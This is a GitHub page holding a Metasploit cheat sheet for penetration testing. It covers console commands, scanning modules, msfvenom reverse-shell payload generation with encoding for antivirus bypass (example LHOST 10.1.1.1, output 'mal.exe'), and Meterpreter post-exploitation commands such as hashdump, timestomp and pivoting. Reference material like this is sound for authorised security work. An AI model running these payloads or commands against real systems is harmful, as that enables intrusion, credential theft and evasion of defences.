forked from andrewjkerr/security-cheatsheets
-
Notifications
You must be signed in to change notification settings - Fork 255
/
metasploit
174 lines (131 loc) · 4.35 KB
/
metasploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
**Metasploit Console Basics**
#Search for module:
msf > search [regex]
#Specify and exploit to use:
msf > use exploit/[ExploitPath]
#Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]
#Show options for the current modules:
msf > show options
#Set options:
msf > set [Option] [Value]
#Start exploit:
msf > exploit
**Useful Auxiliary Modules **
#Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
#DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
#FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
#Proxy Server
msf > use auxiliary/server/socks4
msf > run
**msfvenom**
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode
them. This tool replaces the former msfpayload and msfencode tools. Run with ‘'-l payloads’ to get a list of payloads.
$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
#Example
Reverse Meterpreter payload as an executable and redirected into a file:
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe
#Format Options (specified with –f)
--help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code
#Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders'
to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
#Example
Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
**Metasploit Meterpreter**
#Base Commands:
? / help: Display a summary of commands exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
#File System Commands:
cd: Change directory
lcd: Change directory on local (attacker's) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target
machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
#Process Commands:
getpid: Display the process ID that Meterpreter is
running inside
getuid: Display the user ID that Meterpreter is
running with
ps: Display process list
kill: Terminate a process given its process ID
execute: Run a given program with the privileges
of the process the Meterpreter is loaded in
migrate: Jump to a given destination process ID
- Target process must have same or lesser privileges
- Target process may be a more stable process
- When inside a process, can access any files that
process has a lock on
#Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system's routing table
#Misc Commands:
idletime: Display the duration that the GUI of the
target machine has been idle
uictl [enable/disable] [keyboard/
mouse]: Enable/disable either the mouse or
keyboard of the target machine
screenshot: Save as an image a screenshot of
the target machine
#Additional Modules:
use [module]: Load the specified module
#Example:
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp:Alter NTFS file timestamps
**Managing Sessions**
#Multiple Exploitation:
#Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
#Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit –j
#List all current jobs (usually exploit listeners):
msf > jobs –l
#Kill a job:
msf > jobs –k [JobID]
#Multiple Sessions:
#List all backgrounded sessions:
msf > sessions -l
#Interact with a backgrounded session:
msf > session -i [SessionID]
#Background the current interactive session:
meterpreter > <Ctrl+Z>
or
meterpreter > background
#Routing Through Sessions:
All modules (exploits/post/aux) against the target
subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]